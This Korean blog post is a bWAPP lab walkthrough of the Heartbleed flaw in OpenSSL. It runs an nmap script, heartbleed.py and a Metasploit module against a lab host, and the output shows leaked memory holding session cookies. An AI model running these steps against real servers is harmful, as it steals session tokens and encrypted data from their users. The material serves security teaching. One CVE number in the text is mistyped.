정보보안(구버전)/ bWAPP 2019. 2. 25. 16:08

웹 해킹 bWAPP - 105. A9 - Using Known Vulnerable Components - Heartbleed Vulnerability

 

 

본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다. 

 

 

1. Using Known Vulnerable Components

 

 - OWASP Top10 A9 - 알려진 취약점이 있는 구성 요소 사용

 - 슈퍼유저 권한으로 운영되는 취약한 라이브러리/프레임워크, 기타 SW 모듈로 인한 데이터 유실 및 서버 권한 획득이

   가능한 취약점이다.

 

 

 

2. Heartbleed Vulnerability

 

 - Open SSL 라이브러리의 구조적인 취약점이다.

 - Open SSL 환경에서 서버와 클라이언트 간에 암호화 통신을 통해서 안정적인 연결이 유지되는지 Heartbeat 기능

   (Keepalive 기능 수행)을 사용한다.

 - 동작 과정은 클라이언트가 임의 길이를 갖고 있는 정보를 서버에게 보내면 서버는 동일한 길이의 정보를 응답한다.

 - 이때, 클라이언트가 거짓의 길이 정보를 서버에게 보내면 서버는 Heartbeat에서 이를 검증하지 않고, 

   거짓 길이의 정보만큼 응답하는 취약점이 있다.

 - Ex) 족발집에서 족발을 주문할때 "대자같은 소자 주세요~" 라고 요청시 바보같이 정말 대자를 주는 경우....

 - CVE-2016-0160 취약점 : https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160

 

 

 

3. Using Known Vulnerable Components - Heartbleed Vulnerability

 

 - 이 시나리오는 Heartbleed 취약점을 이용한 스캔을 실시하여 정보를 획득하는 내용이다.

 

  

Ex1) Using Known Vulnerable Components - Heartbleed Vulnerability

 

 

보안 레벨 선택 및 시나리오 선택

 

 

 

'attack scritp...'을 클릭하여 'heartbleed.py' 다운로드 실시 

 

 

 

'파일 저장' 선택 -> '확인' 버튼 클릭

 

 

 

105-0. bWAPP HTTPs 주소.txt

로컬 브라우저에서 https로 bWAPP 접속 및 로그인 실시

 

 

 

'nmap'을 이용하여 Hearbleed 취약점 스켄 실시

root@kali:~# nmap --script ssl-heartbleed -sV -p 8443 192.168.20.205

 

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-22 17:09 KST
Nmap scan report for www.bwapphttpslow.com (192.168.20.205)
Host is up (0.00019s latency).

 

PORT     STATE SERVICE  VERSION
8443/tcp open  ssl/http nginx 1.4.0
|_http-server-header: nginx/1.4.0
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|          
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://cvedetails.com/cve/2014-0160/
MAC Address: 00:0C:29:5B:24:81 (VMware)

 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds


root@kali:~#

 

 

 

'heartbleed.py'을 이용하여 취약점 확인

root@kali:~# cd Downloads/
root@kali:~/Downloads# ls
heartbleed.py  o-saft

 

root@kali:~/Downloads# python heartbleed.py -p 8443 192.168.20.205
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 675
 ... received message: type = 22, ver = 0302, length = 203
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 0D 0A 41 63  ....#.........Ac
  00e0: 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65  cept-Language: e
  00f0: 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 35 0D 0A 41  n-US,en;q=0.5..A
  0100: 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67 3A 20  ccept-Encoding:
  0110: 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 2C 20 62  gzip, deflate, b
  0120: 72 0D 0A 52 65 66 65 72 65 72 3A 20 68 74 74 70  r..Referer: http
  0130: 73 3A 2F 2F 31 39 32 2E 31 36 38 2E 32 30 2E 32  s://192.168.20.2
  0140: 30 35 3A 38 34 34 33 2F 0D 0A 43 6F 6F 6B 69 65  05:8443/..Cookie
  0150: 3A 20 73 65 63 75 72 69 74 79 5F 6C 65 76 65 6C  : security_level
  0160: 3D 30 3B 20 50 48 50 53 45 53 53 49 44 3D 61 35  =0; PHPSESSID=a5
  0170: 63 38 34 64 39 33 35 34 39 35 31 38 65 64 37 30  c84d93549518ed70
  0180: 61 39 62 66 37 32 62 63 32 31 64 63 37 30 0D 0A  a9bf72bc21dc70..
  0190: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70  Connection: keep
  01a0: 2D 61 6C 69 76 65 0D 0A 55 70 67 72 61 64 65 2D  -alive..Upgrade-
  01b0: 49 6E 73 65 63 75 72 65 2D 52 65 71 75 65 73 74  Insecure-Request
  01c0: 73 3A 20 31 0D 0A 0D 0A 46 FD 95 C3 F7 C7 4F 09  s: 1....F.....O.
  01d0: 49 FD AB 9C 1C 6F 56 F3 00 00 00 00 00 00 00 00  I....oV.........
  01e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  01f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0200: 63 2D 77 65 62 72 74 63 03 66 74 70 00 0F 00 01  c-webrtc.ftp....
  0210: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
  0220: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
  0230: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
  0240: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
  0250: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................
  0260: 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01  ................

~ 중간 생략 ~

 

root@kali:~/Downloads# cd
root@kali:~#

 

 

 

메타스플로잇을 이용하여 Heartbleed 취약점 확인

root@kali:~# msfconsole -q

msf >
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 192.168.20.205
rhosts => 192.168.20.205


msf auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443


msf auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true


msf auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[*] 192.168.20.205:8443   - Sending Client Hello...
[*] 192.168.20.205:8443   - SSL record #1:
[*] 192.168.20.205:8443   -  Type:    22
[*] 192.168.20.205:8443   -  Version: 0x0301
[*] 192.168.20.205:8443   -  Length:  86
[*] 192.168.20.205:8443   -  Handshake #1:
[*] 192.168.20.205:8443   -   Length: 82
[*] 192.168.20.205:8443   -   Type:   Server Hello (2)
[*] 192.168.20.205:8443   -   Server Hello Version:           0x0301
[*] 192.168.20.205:8443   -   Server Hello random data:       5c6fafe68f37d438af05b1d195db859b5666fd7667fc23f5b108e47f636d32e9
[*] 192.168.20.205:8443   -   Server Hello Session ID length: 32
[*] 192.168.20.205:8443   -   Server Hello Session ID:        756919b93f7415b1fcd9ffeb957d0f23845412404bcb4c785e7f8093131ccdc9
[*] 192.168.20.205:8443   - SSL record #2:
[*] 192.168.20.205:8443   -  Type:    22
[*] 192.168.20.205:8443   -  Version: 0x0301
[*] 192.168.20.205:8443   -  Length:  675
[*] 192.168.20.205:8443   -  Handshake #1:
[*] 192.168.20.205:8443   -   Length: 671
[*] 192.168.20.205:8443   -   Type:   Certificate Data (11)
[*] 192.168.20.205:8443   -   Certificates length: 668
[*] 192.168.20.205:8443   -   Data length: 671
[*] 192.168.20.205:8443   -   Certificate #1:
[*] 192.168.20.205:8443   -    Certificate #1: Length: 665
[*] 192.168.20.205:8443   -    Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x000055f85285dd88>, issuer=#<OpenSSL::X509::Name:0x000055f85285ddb0>, serial=#<OpenSSL::BN:0x000055f85285ddd8>, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC>
[*] 192.168.20.205:8443   - SSL record #3:
[*] 192.168.20.205:8443   -  Type:    22
[*] 192.168.20.205:8443   -  Version: 0x0301
[*] 192.168.20.205:8443   -  Length:  203
[*] 192.168.20.205:8443   -  Handshake #1:
[*] 192.168.20.205:8443   -   Length: 199
[*] 192.168.20.205:8443   -   Type:   Server Key Exchange (12)
[*] 192.168.20.205:8443   - SSL record #4:
[*] 192.168.20.205:8443   -  Type:    22
[*] 192.168.20.205:8443   -  Version: 0x0301
[*] 192.168.20.205:8443   -  Length:  4
[*] 192.168.20.205:8443   -  Handshake #1:
[*] 192.168.20.205:8443   -   Length: 0
[*] 192.168.20.205:8443   -   Type:   Server Hello Done (14)
[*] 192.168.20.205:8443   - Sending Heartbeat...
[*] 192.168.20.205:8443   - Heartbeat response, 13027 bytes
[+] 192.168.20.205:8443   - Heartbeat response with leak
[*] 192.168.20.205:8443   - Printable info leaked:
......\n..Ghj-.2...0.xJD.yq...C..cM.+...f.....".!.9.8.........5.............................3.2.....E.D...../...A.......................................4; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36..Accept: text/css,*/*;q=0.1..Referer: https://192.168.20.205:8443/bWAPP/heartbleed.php..Accept-Encoding: gzip, deflate, br..Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7..Cookie: PHPSESSID=2684e39de9267451950927d36aa1d0cc; security_level=0....o......g..."...TUS;q=0.8,en;q=0.7..Cookie: PHPSESSID=2684e39de9267451950927d36aa1d0cc; security_level=0....Br.....TF;..<...=0.8,en;q=0.7..Cookie: PHPSESSID=2684e39de9267451950927d36aa1d0cc; security_level=0....bug=96&form_bug=submit..P}...*.....V_rform=submit5@Qs...r0jUuM^3..|.....[.....a.~.H.<./.3...$...]...L.J..................................................................................................................................... repeated 11964 times .....................................................................................................................................
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssl/openssl_heartbleed) > quit

root@kali:~#

 

 

[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)

 

웹해킹 105. A9 - bWAPP Using Known Vulnerable Components - Heartbleed Vulnerability


https://youtu.be/T7a0tVTtY7Q



Posted by 김정우 강사(카카오톡 : kim10322)
,


Q